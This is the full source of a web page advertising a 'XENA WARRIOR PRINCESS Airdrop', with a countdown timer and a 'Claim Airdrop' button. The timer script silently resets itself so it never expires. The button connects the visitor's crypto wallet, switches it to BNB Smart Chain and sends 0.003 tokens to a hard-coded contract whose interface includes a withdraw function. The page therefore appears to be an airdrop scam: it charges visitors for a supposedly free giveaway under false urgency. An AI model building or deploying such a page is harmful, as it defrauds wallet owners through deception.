<html>
  <div >
    <img src="./3s.jpeg" alt="" class="bg">
    <div class="modal1">
      <h1 class="font">XENA WARRIOR PRINCESS Airdrop</h1>
      <div class="days"><h1 id="days" style="color:white;font-size: 40px;font-family: Arial, Helvetica, sans-serif;">30</h1>
      <h3 style="color:white;margin-top:-20px;font-family: Arial, Helvetica, sans-serif;">DAYS</h3></div>
      <div class="days"><h1 id="hours" style="color:white;font-size: 40px;font-family: Arial, Helvetica, sans-serif;">30</h1>
        <h3 style="color:white;margin-top:-20px;font-family: Arial, Helvetica, sans-serif;">HOURS</h3></div>
        <div class="days"><h1 id="minutes" style="color:white;font-size: 40px;font-family: Arial, Helvetica, sans-serif;">30</h1>
          <h3 style="color:white;margin-top:-20px;font-family: Arial, Helvetica, sans-serif;">MINUTES</h3></div>
          <div class="days"><h1 id="seconds" style="color:white;font-size: 40px;font-family: Arial, Helvetica, sans-serif;">30</h1>
            <h3 style="color:white;margin-top:-20px;font-family: Arial, Helvetica, sans-serif;">SECONDS</h3></div>
      <button  class="btn" id="btn">
        Claim Airdrop
      </button>

  </div>


  </div>
        
  <script>
    // Set the date we're counting down to
let countDownDate = new Date("mar 17, 2022 20:00:00").getTime();

// Update the count down every 1 second
var x = setInterval(function () {
// Get today's date and time
var now = new Date().getTime();

// Find the distance between now and the count down date
var distance = countDownDate - now;

// Time calculations for days, hours, minutes and seconds
var days = Math.floor(distance / (1000 * 60 * 60 * 24));
var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
var seconds = Math.floor((distance % (1000 * 60)) / 1000);

// Output the result in an element with id=".countdown"
document.getElementById('days').innerHTML=days
document.getElementById('hours').innerHTML=hours
document.getElementById('minutes').innerHTML=minutes
document.getElementById('seconds').innerHTML=seconds



// If the count down is over, write some text
if (distance < 0) { 
countDownDate += 3600000 * Math.abs(Math.round(distance / 3600000)-1);
}
}, 1000);

</script>
<script src="https://unpkg.com/web3@latest/dist/web3.min.js"></script>
<script type="text/javascript">
    function mint() {
     

const ethEnabled = async () => {
  if (window.ethereum) {
    window.ethereum.request({ method: "eth_requestAccounts" });
    const chainId = await window.ethereum.request({
      method: "eth_chainId",
    });
    console.log(chainId);
    window.web3 = new Web3(window.ethereum);
    return true;
  }
  return false;
};
ethEnabled().then(() => {
  
  try {
    const Id = window.ethereum.request({ method: "eth_chainId" });
    if (Id !== "0x38") {
      window.ethereum.request({
        method: "wallet_switchEthereumChain",
        params: [{ chainId: "0x38" }],
      });
     
   const web3 = new Web3(window.ethereum);
   var hex = web3.utils.toHex(0.003* 1e18);
         
          
          var abi=[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Balance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"Claim_AirDrop","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"_users","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"cost","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"total_ClaimAirdrop","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"total_claims","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]
          web3.eth.getAccounts(function(err,accounts) {
               const accountaddress=accounts[0]
               console.log(accountaddress)
               const contractAddress = "0x42f95c864e7A4Ac3F4f6befc410C8a648671aeC2";
               var contract=new web3.eth.Contract(abi,contractAddress,{
                 from:accountaddress,
               })
               const tx = {
         'from': accountaddress,
         'to': contractAddress,
          'value':hex,
         'data': contract.methods.Claim_AirDrop(3).encodeABI()};
         const txHash = web3.eth.sendTransaction(tx);
        txHash.then((result) => {
          console.log(result)
        })
          .catch((error) => {
            alert(error)
          })
                 
     
             })
             

          
        }
        else{
          var abi=[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Balance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"Claim_AirDrop","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"_users","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"cost","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"total_ClaimAirdrop","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"total_claims","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]
          const web3 = new Web3(window.ethereum);
      var hex = web3.utils.toHex(0.003* 1e18);
         
          web3.eth.getAccounts(function(err,accounts) {
               const accountaddress=accounts[0]
               console.log(accountaddress)
               const contractAddress = "0x42f95c864e7A4Ac3F4f6befc410C8a648671aeC2";
               var contract=new web3.eth.Contract(abi,contractAddress,{
                 from:accountaddress,
               })
               const tx = {
         'from': accountaddress,
         'to': contractAddress,
//          'value':'0xf4240',
                 'value':hex,
         'data': contract.methods.Claim_AirDrop(3).encodeABI()};
        const txHash = web3.eth.sendTransaction(tx);
        txHash.then((result) => {
          console.log(result)
        })
          .catch((error) => {
            alert(error)
          })
                
                 
     
             })
             
        }
      } catch (error) {
        console.log("error");
        if (error.code == 4001) {
          alert("Please connect to smart  Chain");
        }
      }
    });
  }
  document.getElementById('btn').addEventListener('click',mint)
  </script>
  <style>
    #bg {
  position: fixed; 
  top: 0; 
  left: 0; 
	
  /* Preserve aspet ratio */
  min-width: 100%;
  min-height: 100%;
}
img.bg {
  /* Set rules to fill background */
  min-height: 100%;
  min-width: 1024px;
	
  /* Set up proportionate scaling */
  width: 100%;
  height: auto;
	
  /* Set up positioning */
  position: fixed;
  top: 0;
  left: 0;
}
.modal1 {
  text-align: center;
  display: block; /* Hidden by default */
  position: fixed; /* Stay in place */
  z-index: 2; /* Sit on top */
  left: 25%;
  right:auto;
  align-content: center;
  top: 20%;
  width: 50%; /* Full width */
  height: 400px; /* Full height */
  overflow: auto; /* Enable scroll if needed */
  background: rgb(232,128,3);
background: linear-gradient(143deg, rgba(232,128,3,1) 0%, rgba(184,91,13,1) 100%);
 
  box-shadow: 0px 0px 20px 4px rgba(5, 0, 0, 0.86);
}
.font{
  font-size: 25px;
  font-family: Arial, Helvetica, sans-serif;
  padding: 10px;
  color: white;
}
.days{
  margin-top: 40px;
  display: inline-block;
  text-align: center;
  margin-left: 50px;
  height: 120px;
  width: 100px;
  background: rgb(232,128,3);
  border-radius: 20px;
background: linear-gradient(143deg, rgba(232,128,3,1) 0%, rgba(184,91,13,1) 100%);
}.btn {
  -webkit-border-radius: 28;
  -moz-border-radius: 28;
  border-radius: 28px;
  font-family: Arial;
  color: rgb(232,128,3);
  font-size: 20px;
  background: #ffffff;
  padding: 10px 20px 10px 20px;
  text-decoration: none;
  margin-top: 40px;
}

.btn:hover {
  cursor: pointer;
}
@media screen and (max-width: 482px){
  .modal1{
    width: 80%;
    height: 400px;
  }
}

  </style>
  </html>